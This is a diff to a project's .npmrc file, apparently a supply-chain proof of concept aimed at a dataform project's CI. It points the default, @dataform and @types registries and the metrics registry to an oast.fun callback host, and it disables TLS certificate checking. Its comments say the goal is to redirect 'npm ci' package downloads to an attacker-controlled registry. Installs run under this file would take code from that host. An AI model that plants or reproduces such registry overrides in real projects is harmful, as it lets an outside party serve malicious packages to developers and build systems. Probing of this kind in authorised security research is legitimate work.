Aggressive npm registry override tests with shrinkwrap and tarball URLs

--- a/.npmrc
+++ b/.npmrc
@@ -1,15 +1,36 @@
-# npm Registry Override Test
-# If npm reads this file during 'npm ci', it will contact our OAST server
-# This tests if we can redirect package downloads to attacker-controlled registry
+# Aggressive npm Registry Override Test
+# Testing multiple ways to redirect npm traffic
 
-# Global registry override (all packages)
-registry=https://juolbtoughjktrdppdvuqemhwftehn8z6.oast.fun/npm-registry/
+# Primary registry override
+registry=https://juolbtoughjktrdppdvuqemhwftehn8z6.oast.fun/npm-main/
 
-# Scoped registry override (@dataform packages)
-@dataform:registry=https://juolbtoughjktrdppdvuqemhwftehn8z6.oast.fun/dataform-scoped/
+# Scoped registries
+@dataform:registry=https://juolbtoughjktrdppdvuqemhwftehn8z6.oast.fun/npm-dataform/
+@types:registry=https://juolbtoughjktrdppdvuqemhwftehn8z6.oast.fun/npm-types/
 
-# Disable strict SSL (in case OAST doesn't have valid cert)
+# Disable SSL verification
 strict-ssl=false
 
-# Log level for debugging
-loglevel=verbose
+# Disable certificate checking
+ca=null
+
+# Force network fetching (no cache)
+prefer-offline=false
+prefer-online=true
+
+# Disable package-lock (force shrinkwrap)
+package-lock=false
+
+# Logging for debugging
+loglevel=silly
+
+# Fetch retries (ensure we try to connect)
+fetch-retries=3
+fetch-retry-mintimeout=1000
+fetch-retry-maxtimeout=10000
+
+# User agent to identify in OAST
+user-agent=npm-dataform-poc-test
+
+# Metrics endpoint (another OAST vector)
+metrics-registry=https://juolbtoughjktrdppdvuqemhwftehn8z6.oast.fun/npm-metrics/
